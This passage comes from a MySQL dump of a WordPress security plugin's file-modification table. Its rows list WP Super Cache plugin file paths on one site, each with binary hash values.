('?UÉ ”Qç-âÕ™ã¼£M', 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-sr_RS.po', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/languages/wp-super-cache-sr_RS.po', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'y°Sa,ÑzŒnFš×È®á', '¸ú‚%è~c—õÃ’W­Ž¨RéM6õ]}®ÑùHµ', '', 0, '?'),
('D1€0ì§^8T[&q¤\ZøÑ', 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-sv_SE.mo', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/languages/wp-super-cache-sv_SE.mo', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'è+žoxÜf)9ÈÔŽo', ' ä/;ÛG”Æ\n«ÎQ-]¥€ø}dŸ„ þ cóéè', '', 0, '?'),
('Q¥°Ýv¹¨|^¥ö;	Â½c', 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-sv_SE.po', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/languages/wp-super-cache-sv_SE.po', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '•yn6»“ÝW’&~Ìîa¤', '°ŸQK)b¢æ2+”÷®ƒZƒ—ÑÙÚdU¿™ƒØ…‘', '', 0, '?'),
('*v!¯‹y—~˜Î+\n-È', 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-tr_TR.mo', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/languages/wp-super-cache-tr_TR.mo', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¸\\þÙ/Ù‰P¯ß’½Q', '?oÔÂs?ö®QÌi2	pfDLÝxa·w_‰(Ò?9', '', 0, '?'),
('›@³Ômt¾šYKÌËQt', 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-tr_TR.po', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/languages/wp-super-cache-tr_TR.po', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'G)Þ¸m›Œ´ä\nM²juK', '<îußu®n<•[Q	²ÚMÆÃ˜®ž¢*ùSÙ0øl]', '', 0, '?'),
('M4î(NRÉQ“(©¯P', 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-ua_UA.mo', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/languages/wp-super-cache-ua_UA.mo', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '\rA„@eþ„_\r“ü²0\r', 'ó„üò.…’ûtŒz—JCé)žh_N:¸æDÒ7@', '', 0, '?'),
('ˆP¹¶sÉ"I)€Uå¯(¥', 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-ua_UA.po', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/languages/wp-super-cache-ua_UA.po', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ã é‘â…Tœ×Í””¢}', '0-ˆ8\ZP¥Áô¯Æ­Âñ!«Í=˜ß0·™†´‰Óþî\r0#', '', 0, '?'),
('RWNý²0VA&øß', 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-uk.mo', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/languages/wp-super-cache-uk.mo', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'íã¹JL¤¤±E«—Ÿ(Vf', '.gGç2½Ÿz©#\\Ò¬¦\0½UÝ°\\*¬ûH\Zõ³×¢', '', 0, '?'),
('¾Ý1n}›P˜p3b¶W¨¿', 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-uk.po', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/languages/wp-super-cache-uk.po', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '\0iµj"Å`¬;$ºÇ\\çy', '¯¶ÇvÔWùb«OF6\rÚu¾Y­\nùQµmoºSƒü0Ô', '', 0, '?'),
('ç¾WrØv	j‚•‹&ã{', 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-zh_CN.mo', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/languages/wp-super-cache-zh_CN.mo', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'c&—ÊŸ4?²e¥Ò/Žzg', 'yÙ¤†¬ý­¬…„–£›û_Ð×Ò4¨¦@Ã', '', 0, '?'),
(' 7k!CŸ\rhµƒBL´R', 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-zh_CN.po', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/languages/wp-super-cache-zh_CN.po', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '·"}tS˜qJÒ\Z5a×¡-]', 'ÿHAÖ<À5DžcÕÀ‰Xcïw7¾Ãà:ä}fÈ0#', '', 0, '?'),
('dáñ‘äµõûÁ«Í©ÿWð', 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-zh_TW.mo', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/languages/wp-super-cache-zh_TW.mo', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'iŒAP¶^š²P›ÍMî', 'îA#U/grÖ«\náåMšø\0–Éö#ßmÆ$3¯×1', '', 0, '?'),
('	˜\rO²8ïøyŽ2t:', 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-zh_TW.po', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/languages/wp-super-cache-zh_TW.po', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¯ÀAiËÜ)Òzƒ3"¶', '‘eƒ³”ë_ƒ½È\0ž÷úW¢hZá˜‹¼]ç!üu', '', 0, '?'),
('q5{8uÀdàË­§Zûæ', 'wp-content/plugins/wp-super-cache/ossdl-cdn.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/ossdl-cdn.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '=“íÙÈØ:P©Â/yµ;`', '/ÓÒˆö]`ë9úë÷EYº˜5jQ	ï5/×ûð¬>ê', '', 0, '?'),
('ÐåÚÓUØu¦ä<;©w', 'wp-content/plugins/wp-super-cache/package.json', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/package.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'aªèp‰¾Æ£Òæ$™°Ÿ)•', 'ÄPEŽXKœ=Õtš69»úÆÈwàÛPR«q¨¢†', '', 0, '?'),
('$!™Jì9íh€þ•Ôîˆ', 'wp-content/plugins/wp-super-cache/partials/advanced.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/partials/advanced.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', ',ÀÀÑôgN\0$½È¦ÝV', 'Ïèø(«ÇUÍ–\r¿Þãbû\Z»¶|x°°;©S', '', 0, '?'),
('gR·wq2 ÍdÕ¸Àìõ(', 'wp-content/plugins/wp-super-cache/partials/debug.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/partials/debug.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '÷!ÝñtþŠè·YúË%ý', '—ÄmË(hÆbëà V*ÿÞëí/Ð³4·µ€ñ', '', 0, '?'),
('\naïopÎÆYFãE.%m2', 'wp-content/plugins/wp-super-cache/partials/easy.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/partials/easy.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ã¹ŠÙ–Xâc[?»7\nÅˆ', 'l¿.v®)AWôØ¢aÊ`Å¼vúZóÌ‰:ý4', '', 0, '?'),
('Ç1òÐ\\):JA!''ö', 'wp-content/plugins/wp-super-cache/partials/lockdown.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/partials/lockdown.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Uqt»¬¦7wÑ(ÀpR', '›4ûä*Å•ÂJÈÐcYRïÓ³¾L­p/ázisâ', '', 0, '?'),
('''VäòKP¿B1Gé6–|', 'wp-content/plugins/wp-super-cache/partials/preload.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/partials/preload.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'M\\PÛl„\n_ƒßHÇCj5', 'š×€hØÌõ{A·½ç$ Ja­/[J,~8N¼Ò+', '', 0, '?'),
('t;ž7‰[;\r¿J|E%ï•b', 'wp-content/plugins/wp-super-cache/partials/rejected_user_agents.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/partials/rejected_user_agents.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'c¨_7	Nhf%¢býÔ!', '¨Ÿoò ²½ÿ¢yÅå”#aÎÍ¢ÅµÜ%nn°êØ', '', 0, '?'),
('º]C¿\0Õ°‚ÄU€ŽŸéDù', 'wp-content/plugins/wp-super-cache/partials/restore.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/partials/restore.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '{ú4\r/Š•Þ’F—ß–‰ ', '1F‚''„*Nã-ÏðZ#úSJíAËþ€žüNž$', '', 0, '?'),
('YYGŒÃÖ˜VuIü@¢lú', 'wp-content/plugins/wp-super-cache/partials/tracking_parameters.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/partials/tracking_parameters.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ç[¯q"ýÈÅG…)1', 'öT©"«Néð½ôŽ–Ï\rWá}\0±¼Pª\Zk…°¡™', '', 0, '?'),
('#–KBd[\\CeŸÜ2', 'wp-content/plugins/wp-super-cache/plugins/awaitingmoderation.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/plugins/awaitingmoderation.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '|¿ÕX××Õß|“•—%e`', 'Í\\T‹Ë9—ëJ¤á–ØÁàFwj6~ÉìzÉMÑ¸', '', 0, '?'),
('—K«V·~\\ð•¼É~€L', 'wp-content/plugins/wp-super-cache/plugins/badbehaviour.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/plugins/badbehaviour.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '“¢4½bûá\0Ú•0î', 'ÉÅÁ#¯ê«¶³®z€¢8‰ÞµIVCv`ÑâÍãôt‹', '', 0, '?'),
('V%\nùÄBM:cØN‚iô½', 'wp-content/plugins/wp-super-cache/plugins/domain-mapping.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/plugins/domain-mapping.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'B\nézœ\\ÆwÊW¬våi¡', '6k4n|ñ\n¨Ã-¾çŸ²bXN$a=fr£H‚þ', '', 0, '?'),
('Ñr¬ó]R<DÚ‘œ=ÖIÜ', 'wp-content/plugins/wp-super-cache/plugins/dynamic-cache-test.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/plugins/dynamic-cache-test.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '\0Jz¨EŠ¬ž5l1	“´21', '‘<‘ä.\Zç0Mk@§’¸Àä¿Çøe‘x‘o„(8NÐ', '', 0, '?'),
('uîcYbK	Ô§çyˆ÷', 'wp-content/plugins/wp-super-cache/plugins/jetpack.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/plugins/jetpack.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '°I`òÂµzP:ÒyzA½', '<	¬æû?r\r%•¨ƒšQ´Ø·ˆ tîÙNs$J›p©', '', 0, '?'),
('¤qnKSG-SÕåñ=', 'wp-content/plugins/wp-super-cache/plugins/multisite.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/plugins/multisite.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ƒy·³b‹e	Å™ò&žÔ', '~8Ú%JíþuâíO†7ª½«Õ IY÷·Ä\ZpíW}Ä', '', 0, '?'),
('HžNÌ5\nêòDÑ,Po„', 'wp-content/plugins/wp-super-cache/plugins/wptouch.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/plugins/wptouch.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ãá‘‹IW·³òùð¶S»', '_²úTr¸ ç˜Õ¡¹b©âMí‘ãžåµ''ö‚i†–Ÿ', '', 0, '?'),
('­<¯¸ö“ŒÒWCck', 'wp-content/plugins/wp-super-cache/readme.txt', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/readme.txt', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'm€å"–œ¿¼¼8›§û·æ', '·×Þ šûî’‘Ñ	Ð–’†\n˜·jiýÝ³', '', 0, '?'),
('mÃ™ZÀi¢3=9¬£', 'wp-content/plugins/wp-super-cache/rest/class.wp-super-cache-rest-delete-cache.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/rest/class.wp-super-cache-rest-delete-cache.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ž·åp–Óœžlù«', '`áÂYÏ,^F×\\HÓèS´™è"ÖW$×ß"Èâe³', '', 0, '?'),
('1-B2¼Þt¶5ÌŠ5', 'wp-content/plugins/wp-super-cache/rest/class.wp-super-cache-rest-get-cache.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/rest/class.wp-super-cache-rest-get-cache.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'åˆ„®á£"¹¡ìü‘ó\r', 'Ã{ò‚ÝþF,[ƒ1IäarHˆ’?1rp 5', '', 0, '?'),
('Ke"Åd›±6¥é8I', 'wp-content/plugins/wp-super-cache/rest/class.wp-super-cache-rest-get-plugins.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/rest/class.wp-super-cache-rest-get-plugins.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '''â5ÃÜ“Âé%*×:ê"\0', 'OÈ€Ö™é#˜pÎBç³Ÿ\ndyù?oàÕÔ×Eb†„Ü™', '', 0, '?'),
('-ÍdA“£ù¿ÖÔ¥	', 'wp-content/plugins/wp-super-cache/rest/class.wp-super-cache-rest-get-settings.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/rest/class.wp-super-cache-rest-get-settings.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'HÖ=EÙÙ®om¿“oK;', 'ÙŸÌb@÷o…-Ì™`JSLI]%›vÐ.³ò,ÿ‚Ì', '', 0, '?'),
('uôÏ§’åe¤PŽ¥aÂmú', 'wp-content/plugins/wp-super-cache/rest/class.wp-super-cache-rest-get-stats.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/rest/class.wp-super-cache-rest-get-stats.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ý˜ žúà\0ÇÝ^P|"X', 'ñnK–ŽHºh˜qÍ/ZHµw¸¨èf¯Æ‰®~Ä', '', 0, '?'),
('þ£ŠÖS_¥Ì¶Xjô°R', 'wp-content/plugins/wp-super-cache/rest/class.wp-super-cache-rest-get-status.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/rest/class.wp-super-cache-rest-get-status.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '–vð/qô8U$\r3bVo¢', 'Ìºefd(«§YÌuDCáìµz@’!‹‚ªLª&®', '', 0, '?'),
('ä‚å\nº¬"3Lú•FqŠŒ', 'wp-content/plugins/wp-super-cache/rest/class.wp-super-cache-rest-preload.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/rest/class.wp-super-cache-rest-preload.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ýÝòžo^­»\0€ÌÍ', 'è‰¨È\\ì]þ€G=Â$åYË”k* ~†–°]~ë', '', 0, '?'),
('ŸdHÏrx"bÀv9', 'wp-content/plugins/wp-super-cache/rest/class.wp-super-cache-rest-test-cache.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/rest/class.wp-super-cache-rest-test-cache.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '(Ž‘0ªªèŒkÞXé©¤', 'ä»¶;6°!Z‡õ—P£fÉOÉ?"bq\næÝè', '', 0, '?'),
('½ŸgÍ®»ŽBnû*¥Ã\r4', 'wp-content/plugins/wp-super-cache/rest/class.wp-super-cache-rest-update-plugins.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/rest/class.wp-super-cache-rest-update-plugins.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'vå÷Yü”0Ÿ¥~^', '{!FYËºL½¸.ÑV.\ZÜ{+¤;ßQÜ™©Q‘µ', '', 0, '?'),
('äKB+¬~©{]z~®)¶', 'wp-content/plugins/wp-super-cache/rest/class.wp-super-cache-rest-update-settings.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/rest/class.wp-super-cache-rest-update-settings.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', ')Û6¿ðhcvÍú\n‹Ó÷', '€aóQ´Á5xD¿ãæD†…‚™†!G±Ö¦µ°#jóæÇ9', '', 0, '?'),
('ÎÀœZiÊ''ÏVï5à£“', 'wp-content/plugins/wp-super-cache/rest/class.wp-super-cache-settings-map.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/rest/class.wp-super-cache-settings-map.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ˆ¶Úý%;Íc÷–Ùj¯—', '„Ë¤º`„«HÄš''‰Ÿä„ûÒÜe+ÝQn˜ß€Ž’ã', '', 0, '?'),
(' ~®Ë''ò!hkV·H', 'wp-content/plugins/wp-super-cache/rest/load.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/rest/load.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'dJÃ,°^:VÌÝ³Ñì', 'S¸³<\r˜nß1¥ÐGëÿØÑ»:‡3-=’þÕõµ', '', 0, '?'),
('³\0iÂöÙýóÏú=<W¨È', 'wp-content/plugins/wp-super-cache/src/example.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/src/example.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'fì%¹èvO¬ê]…çYÛš×', 'ê¢? öÄ}Æt"¼•ìZý]bÒo)wÛO\\ÏßV_„', '', 0, '?'),
('Á³°*IÔg*Ÿ½f¢“ù\0e', 'wp-content/plugins/wp-super-cache/styling/dashboard.css', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/styling/dashboard.css', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ý6EY=0Ap¡DãùÂb', ',õò\0ƒf‡R5¼1X_vð\n‘ðFÀ{X#©¹rÑü', '', 0, '?'),
('d«­†¯¿\\àŠ´…NÇ®#', 'wp-content/plugins/wp-super-cache/vendor/autoload.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/vendor/autoload.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '=E2i¹‘•eÉ¬ã»Lï(', 'fVoJá4;ãXˆÆlñ‰Œ½ÞWdKÓ‰á¾bi°TÝ', '', 0, '?'),
('ÍÎÕ˜Góíúöt¡FI', 'wp-content/plugins/wp-super-cache/vendor/automattic/jetpack-device-detection/CHANGELOG.md', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/vendor/automattic/jetpack-device-detection/CHANGELOG.md', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'jEìLì_Û{žVg½|VÑ', 'þV§&ÒÞ§uÊ¸`„˜±I>qAJÇ $B@Nî—	È€', '', 0, '?'),
('ôMû‡šöÂ¢\0à¾%''', 'wp-content/plugins/wp-super-cache/vendor/automattic/jetpack-device-detection/LICENSE.txt', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/vendor/automattic/jetpack-device-detection/LICENSE.txt', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¶øm¤gÙÙSf¶0ÌafK', 'ÊgºÌ“fŽ´ßéÁ_H¯óQ<šP@/M ÿtµÇ', '', 0, '?'),
('¿hc\03O4“Ÿ8ckó¼', 'wp-content/plugins/wp-super-cache/vendor/automattic/jetpack-device-detection/README.md', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/vendor/automattic/jetpack-device-detection/README.md', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '×„DøÌ6í(:;ã', 'q9ÝâÃ(eíó¿9y_/-2!`;¾¸y6ûÝ7M»', '', 0, '?'),
('q‹wëÞÅP¢[éÛuœ»', 'wp-content/plugins/wp-super-cache/vendor/automattic/jetpack-device-detection/SECURITY.md', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/vendor/automattic/jetpack-device-detection/SECURITY.md', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'èm·Úy©šïx‡Œ‚Ša5', '@R5…k¡€ÏPwÊ~Èâ!À\nCSÝ"é¶\0îZ%³]"', '', 0, '?'),
('ÇÚÖÓbFi§©SG!<¦', 'wp-content/plugins/wp-super-cache/vendor/automattic/jetpack-device-detection/composer.json', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/vendor/automattic/jetpack-device-detection/composer.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'wVjÎ1©Ž¹4•Îk¶6', ':J!(4È9ïþ~FŸ‰_D1k£ª¢µ«.Ü‹ˆ', '', 0, '?'),
('[pÕ\\°Kå@¡gEG', 'wp-content/plugins/wp-super-cache/vendor/automattic/jetpack-device-detection/src/class-device-detection.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/vendor/automattic/jetpack-device-detection/src/class-device-detection.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Œ1Îqr&!cÑ•ù', 'e‚(*NdTþyVMëƒÍqÀÇùÁ½o_+"•', '', 0, '?'),
(']°ºJWpu$€\re‡g-°', 'wp-content/plugins/wp-super-cache/vendor/automattic/jetpack-device-detection/src/class-user-agent-info.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/vendor/automattic/jetpack-device-detection/src/class-user-agent-info.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'äÓ"‰Ò›üIÆvJýò½d­', '$äQ©°ùç­»Ÿzå`j€(¾ã>Í¼¸\n¿ºvUÊ‚K8Õ', '', 0, '?'),
('×óë\0Ã°ãÓ°N)Ç', 'wp-content/plugins/wp-super-cache/vendor/automattic/jetpack-device-detection/src/functions.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/vendor/automattic/jetpack-device-detection/src/functions.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÑEcÎ`Öîçâ§œù#', 'dp»\0¸Úè\ní„Í÷Ôˆ"ÊüwêŒâ›ž°<#¢', '', 0, '?'),
('ÏftíŽh¾Å$ÃŒî£Î(>', 'wp-content/plugins/wp-super-cache/vendor/composer/ClassLoader.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/vendor/composer/ClassLoader.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'À+æÙfqø(ªÓÿ¡4È®', 'ük(¨\r(Nð¼þjjÚÂ''ÎÌ£å6.÷/‘ÒÕ''', '', 0, '?'),
('©Óc¸hòŽÌP4ôLÈÂ', 'wp-content/plugins/wp-super-cache/vendor/composer/InstalledVersions.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/vendor/composer/InstalledVersions.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '-Y$ÿR\0ŠƒÑõ€', 'N¢RÃ­2áÆßHŠhÛ&HX:b]‹ýdÌ³ŠþÏ2Oå', '', 0, '?'),
('ý})Ø3Â…óBM Ï>', 'wp-content/plugins/wp-super-cache/vendor/composer/LICENSE', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/vendor/composer/LICENSE', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '•]_åŒ#Dö´\0óƒµâ', '\Z ŸøÛ’ö%§4~NÙ~Gh!bØ­:w‚˜ÉŒ¿™''', '', 0, '?'),
('ýBcQ,¨†+¸7+°µ', 'wp-content/plugins/wp-super-cache/vendor/composer/autoload_classmap.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/vendor/composer/autoload_classmap.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'hòD&ÆR/fSb‰}\0ú', 'H³â4\\#Ó=ù¿ÜvE¢ì@Çë”*Œ,±iºkÞ¢', '', 0, '?'),
('ª}1Ì*›v4±cE×‰H', 'wp-content/plugins/wp-super-cache/vendor/composer/autoload_namespaces.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/vendor/composer/autoload_namespaces.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '"@É~û‚Ç´[’ò@¯A', 'Á¿Ð¬«»KÄql:å™~ÒÙ¤B‘¬u¾ã$*V zæ)', '', 0, '?'),
('þ©ïHéM<¾¤sª.', 'wp-content/plugins/wp-super-cache/vendor/composer/autoload_psr4.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/vendor/composer/autoload_psr4.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ñ‹v(Ä˜	ðýËë-#‘¡', '8p‘µ/£™m¯{’´B}l"ËIæ’žhHrL', '', 0, '?'),
('Õwø«æ6Û¬ˆýŸåç', 'wp-content/plugins/wp-super-cache/vendor/composer/autoload_real.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/vendor/composer/autoload_real.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ªcx`Qä''Ä‡zh`™:¬', 'EŽèïUsÑEG\ríÐ¶«‚0è?™tÍ€…È', '', 0, '?'),
('¸Âº‰UžüY|ìÝËÚj', 'wp-content/plugins/wp-super-cache/vendor/composer/autoload_static.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/vendor/composer/autoload_static.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'vŸŒ£öá7:ïëý*sþ', '$Tü:º^:ÃF—æS4Y\\fë¡ðÍ»^@FÊ¹„˜', '', 0, '?'),
('¿l.H1Í;ÓËbfšEµ', 'wp-content/plugins/wp-super-cache/vendor/composer/installed.json', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/vendor/composer/installed.json', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÂV0E‡ÝwªbÒÙ:÷AÆ', '2%7ßÆãcj²K¼¯X•ë§¤X¼ëO6ÕõîìJÐlo', '', 0, '?'),
('ð_í}äµÕO0	?ù½Ëä­', 'wp-content/plugins/wp-super-cache/vendor/composer/installed.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/vendor/composer/installed.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'TÐ(ühÓPË—“H©^Ú', 'äèù,§8\n''görgJ·Ä±y×,Mé2GÜì¿Ã\0±Ï', '', 0, '?');
INSERT INTO `wpou_wffilemods` VALUES
('ýBÅþÑÌÿKA£D¶M®Ž', 'wp-content/plugins/wp-super-cache/vendor/composer/platform_check.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/vendor/composer/platform_check.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '=5g´Ê×³å>b?K;', 'lo2;èg±Á³_JëxÓcóŠtì³„0{“~£§*', '', 0, '?'),
('ÞÉdlöS~™ãb´ãýUÂ', 'wp-content/plugins/wp-super-cache/wp-cache-base.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/wp-cache-base.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '3¤à ¬ux¢M#ýc»\\', '¹7‡Õ~ÂÙúÃxDÌlu†Õ9Ÿã¨j½ˆ', '', 0, '?'),
('—«…§fsQEë_ÉÉ]f', 'wp-content/plugins/wp-super-cache/wp-cache-config-sample.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wp-super-cache/wp-cache-config-sample.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '„ºQ_éÎ˜Ž€\Zžv™.', '~Á£—¾ËN\0	àÍÁ²W=25}fÖðÕ‰‘m”', '', 0, '?'),
